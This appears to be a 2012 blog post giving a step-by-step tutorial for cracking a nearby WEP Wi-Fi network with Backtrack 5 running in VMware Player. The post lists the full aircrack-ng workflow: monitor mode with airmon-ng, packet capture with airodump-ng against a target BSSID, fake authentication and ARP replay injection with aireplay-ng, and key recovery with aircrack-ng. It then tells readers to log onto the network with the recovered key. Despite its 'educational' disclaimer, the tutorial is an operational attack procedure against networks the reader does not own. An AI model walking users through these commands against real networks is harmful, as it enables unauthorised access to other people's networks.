Friday 23 November 2012

How to Crack WEP Wireless Networks By Using Backtrack 5 + VMware Player

0 comments

Today we're going to run down, step-by-step, how to crack a Wi-Fi network with WEP security turned on. But first, a word: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise. 

What You'll Need :
  • A compatible wireless adapterwireless adapter that's capable of packet injection.
  • Backtrack 5 R3 - I prefer you to download BT5R3_GNOME_x32.iso. You can download it from HERE.
  • VMware Player - is use to run a typical Linux system as your virtual system.The size of this software is around 70-75 MB. You can download it from HERE.
  • A nearby WEP-enabled Wi-Fi network - The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it.
  • Patience and Don't give up is needed :)

Crack That WEP :

1.   Install VMware Player and create a new virtual machine for your backtrack.
      Click Create a New Virtual Machine > Tick at 'Installer disc image file    
      (iso): > Browse that backtrack that you have downloaded. > Next > 
      Choose Linux and version 'Red Hat Enterprise Linux 5' > Next > Enter your 
      virtual machine name > Next > Next > Finish.

2.   Now you just successful create Backtrack virtual machine inside your 
      windows platform, to run this backtrack just click on 'Play virtual machine'
      for default username and password of Backtrack 5 is :
username : root
password : toor
to enter backtrack user interface type : startx

3.   Things you should look before to start cracking :
  • make sure USB wireless adapter is plugged.
  • Check either your wireless adapter is connected to VMware Player or not. Go to "Virtual Machine" > "Removable Devices" > your adapter name and make sure is connected. (press Ctrl + Alt to simply managing virtual machine system and your windows.)

4.   Ok let's start. launch console (terminal) type this command 
airmon-ng  
: it will display interface network adapter that connected to your backtrack.

airmon-ng <interface name>

airmon-ng wlan0
airmon-ng start wlan0
: above is to enable monitor mode on mon0

airodump-ng mon0
: to search WiFi spots near you.

5.   Choose WiFi spots with WEP encryption and press Ctrl+C. Type this 
      command:
airodump-ng -w wep -c <channel number> --bssid XX:XX:XX:XX:XX:XX mon0
Eg:
airodump-ng -w wep -c 1 --bssid 98:FC:11:69:83:37 mon0
      we're going to watch what's going on with that network you chose and 
      capture that information to a file. 

6.   Next, open new console and type this :
aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX mon0
      you will see association successful which mean AUTH was OPEN.

7.   Open another console and follow this command:
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX mon0
      Here we're creating router traffic to capture more throughput faster to 
      speed up our crack. After a few minutes, that front window will start going 
      crazy with read/write packets.


8.    Wait until enough data has been collected to run your crack. Watch the  
       number in the "#Data" column—you want it to go above 20,000 - 25,000 
       IVs. Here's the part where you might have to grab yourself a cup of 
       coffee. :)


9.   Once you've collected enough data, it's the moment of truth. Launch a 
      new console and type this following command
dir
      You will see the file that contain packets captured named 'wep-01.cap'.

10.  Lastly, run the following to crack that data you've collected :
aircrack-ng -a 1 -b XX:XX:XX:XX:XX:XX wep-01.cap


If you didn't get enough data, aircrack will fail and tell you to try again with more IVs otherwise, the WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network. Done!


Below you'll find video tutorials


Disclaimer: This is for educational purpose and to make you aware of the scenarios of various different security breaches. The administrator or the authors of memberdotmy will not be responsible for any misuse of this post.

credit to: matafungsi



Comments

0 comments to "How to Crack WEP Wireless Networks By Using Backtrack 5 + VMware Player"

Post a Comment

 

Copyright 2013 All Rights Reserved Customize Revolution Theme by matafungsi